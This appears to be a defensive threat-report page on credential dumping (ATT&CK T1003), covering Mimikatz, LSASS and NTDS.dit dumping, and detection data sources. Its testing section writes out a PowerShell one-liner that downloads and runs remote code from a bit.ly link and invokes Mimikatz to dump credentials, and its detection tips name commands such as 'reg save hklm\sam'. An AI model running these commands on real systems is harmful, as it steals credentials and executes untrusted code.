TECHNIQUE T1003

Credential Dumping

While it wasn’t among our top 10 threats by volume, Credential Dumping affected a wide swath of our customers, due in no small part to the prominence of tools such as Mimikatz.

11

Overall Rank

32%

Organizations affected

762

Confirmed threats

Analysis

Credential Dumping accounted for a slightly larger percentage of total threats in 2019 but affected a slightly smaller percentage of customers.

Why do adversaries Dump Credentials?

Credential Dumping refers to a variety of methods that adversaries and professional penetration testers use to obtain legitimate usernames and passwords. Legitimate credentials offer adversaries one of the most effective and discreet means of accessing valuable data and systems. While there are methods of access that don’t require legitimate user credentials (vulnerability exploitation, for example), a working username and password are among the best tools for inconspicuously accessing a system of interest. For this reason, there is a vibrant market for stolen credentials on a wide variety of criminal forums.

Listed under the “Credential Access” tactic, Credential Dumping also enables initial access, lateral movement, and privilege escalation. The technique’s prevalence is largely the result of necessity. Adversaries effectively need credentials to accomplish their goals, and there is an abundance of very effective credential theft tools (e.g., Mimikatz, L0phtCrack, and gsecdump) that help accommodate this need.

Mimikatz is a major contributor to the prominence of Credential Dumping among threat detections in the environments we monitor.

How do adversaries Dump Credentials?

Some behaviors we commonly observe are:

  • PowerShell and other processes (e.g., Windows Task Manager and Sysinternals ProcDump) accessing and dumping memory from the Local Security Authority Subsystem Service (lsass.exe)
  • NTDSUtil dumping NTDS.dit (Active Directory)
  • Active Directory Explorer (AD Explorer) taking snapshots of Active Directory
  • Windows Registry Console Tool (reg.exe) exporting Windows Registry hives containing credentials
  • Windows Credential Editor dumping NT Lan Manager (NTLM) hashes

Emerging tactics

Some less common behaviors include:

  • Using Credential Dumping tools such as SafetyKatz and Cobalt Strike in memory
  • Leveraging Credential Dumping tools in non-executable files such as XSL stylesheets

Sighted with

We frequently observe this technique occurring in tandem with PowerShell (T1086), which is likely because the most common invocation method for Mimikatz relies on PowerShell.

Definition

Detection

MITRE’s data sources

  • API monitoring
  • Process monitoring
  • PowerShell logs
  • Process command-line parameters

Collection requirements

MITRE ATT&CK does not include file monitoring (e.g., password files written to disk) among the data sources that are useful for observing Credential Dumping. While it may be an indication of credential theft activity along with other data sources—such as process monitoring or process command-line parameters—file monitoring by itself is not a reliable data source for Credential Dumping activity.

Process monitoring

Process monitoring, however, is a data source that security teams should collect from if they want to observe Credential Dumping involving tools such as Mimikatz, Empire, L0phtCrack, and gsecdump. One quick and reliable way to observe and potentially detect credential harvesting is to monitor processes for known malicious binaries in combination with LSASS injection. Understanding the processes or programs in an environment that require access to LSASS will make this approach more effective.

Process command-line parameters

Monitoring process command-line parameters for known malicious CLI syntaxes may take some research and testing, but it’s also a reliable way to observe and/or detect credential harvesting activity emanating from tools such as Mimikatz and Empire. In order for this data source to be used effectively, command lines must be specific and not overly generalized (i.e., using only one command option filter).

PowerShell logs

Enabling and monitoring PowerShell logs for known malicious syntax can help to detect Credential Dumping activity as well. This is particularly useful for observing things such as Invoke-Mimikatz and POWELIKS. At times when malicious binaries may not be observed via process monitoring, PowerShell logs may help detect activity reliant on PowerShell.

API monitoring

API monitoring is another good source to collect on if you want to observe Credential Dumping. The key to API monitoring is knowing what and who should be directly connecting to the domain controller (DC). Knowing what IP address, applications, and user accounts typically make API calls to the DC will help to reduce false positives and create more reliable detections to Credential Dumping activity, particularly for tools such as DCSync, Mimikatz, and PowerSploit.

Detection suggestions

If you’re interested in generating reliable detection coverage for Credential Dumping activity, you’ll want to consider monitoring for the following behaviors:

  • Unknown or known malicious processes injecting into LSASS
  • DC connections from unusual IP addresses associated with non-standard or known compromised user accounts
  • reg.exe usage with command-line reg save hklm\sam
  • The binary mimikatz.exe or references to Mimikatz arguments in the CLI
  • Use of ntdsutil ifm

Weeding out false positives

Many of the techniques and tools used for administrative purposes can also be used for malicious Credential Dumping activity. As such, monitoring of processes without CLI and/or context can lead to a large number of false positives, particularly with processes such as adfind.exe, taskmgr.exe, ntdsutil.exe, reg.exe, vssadmin.exe, PowerShell, and adexplorer.exe.

Testing

Getting Started With Atomic Red Team

Start testing your defenses against Credential Dumping using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.

Getting started

View Atomic tests for T1003: Credential Dumping. In most environments, these should be sufficient to generate a useful signal for defenders.

Run this test on a Windows system using PowerShell:
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1tCrad1e'); Invoke-Mimikatz -DumpCr"
Useful telemetry will include:
Data sourceTelemetry
Data source:

Process monitoring

Telemetry:

powershell.exe

Data source:

Process command line

Telemetry:

“DownloadString”, “WebClient”, and the presence of a URL

Data source:

Network connection

Telemetry:

powershell.exe establishing an external network connection

Review and repeat

Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:

  • Were any of your actions detected?
  • Were any of your actions blocked or prevented
  • Were your actions visible in logs or other defensive telemetry?

Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.

Ricky Espinoza
Detection Engineer
The detection strategies in this section were brought to you by Ricky Espinoza! Ricky has eight years of experience and multiple SANS certifications. Prior to joining Red Canary, Ricky worked at the University of Colorado running incident response procedures, network security, and vulnerability management.
The detection strategies in this section were brought to you by Ricky Espinoza! Ricky has eight years of experience and multiple SANS certifications. Prior to joining Red Canary, Ricky worked at the University of Colorado running incident response procedures, network security, and vulnerability management.